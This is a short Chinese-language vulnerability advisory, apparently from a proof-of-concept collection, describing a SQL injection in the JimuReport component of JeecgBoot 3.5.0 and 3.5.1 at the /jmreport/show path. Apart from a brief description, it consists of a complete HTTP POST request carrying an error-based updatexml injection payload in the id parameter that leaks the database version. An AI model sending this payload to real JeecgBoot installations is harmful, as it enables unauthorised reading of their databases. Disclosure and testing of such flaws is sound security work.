JeecgBoot 积木报表 /jmreport/show 路径存在SQL注入

日期: 2023-08-03 | 影响软件: Jeecg | POC: 已公开

漏洞描述

JeecgBoot 是JeecgBoot社区的一款基于代码生成器的低代码平台。 其中JeecgBoot 在 3.5.0 和 3.5.1 版本中,使用的积木报表组件 在路径 /jmreport/show 的 id参数中存在SQL注入。

PoC代码

POST /jeecg-boot/jmreport/show HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 147
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

{"id":"961455b47c0b86dc961e90b5893bff05","apiUrl":"","params":"{"id":"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '"}"}

相关漏洞推荐